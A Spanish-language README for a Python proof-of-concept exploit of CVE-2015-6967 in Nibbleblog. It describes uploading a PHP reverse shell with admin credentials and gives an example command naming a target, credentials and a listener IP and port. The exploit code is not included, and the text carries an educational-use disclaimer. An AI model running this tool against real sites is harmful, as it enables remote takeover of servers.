
CVE-2015-6967 Exploit PoC
Exploit PoC para CVE-2015-6967
Este script de Python explota una vulnerabilidad en Nibbleblog (CVE-2015-6967) para subir una reverse shell a un objetivo vulnerable. El script solicita al usuario la URL objetivo, las credenciales de usuario y la IP/puerto de tu equipo, y luego procede a explotar la vulnerabilidad subiendo una reverse shell en PHP.
Este script está destinado únicamente a fines educativos. NO lo uses para actividades ilegales. Siempre obtén permiso explícito antes de probar o explotar cualquier vulnerabilidad en sistemas que no poseas o para los que no tengas autorización de acceso.
requestsargparsecoloramapyfigletPuedes instalar las dependencias necesarias usando el siguiente comando:
pip install requests colorama pyfiglet
El script requiere varios parámetros para ejecutarse:
url: URL objetivo de Nibbleblog (ej. http://10.10.14.14/nibbleblog)-U, --user: Nombre de usuario del administrador de Nibbleblog-P, --password: Contraseña del administrador de Nibbleblog-p, --host-port: Puerto local para que la reverse shell se conecte-H, --host-ip: Dirección IP local para que la reverse shell se conectepython exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100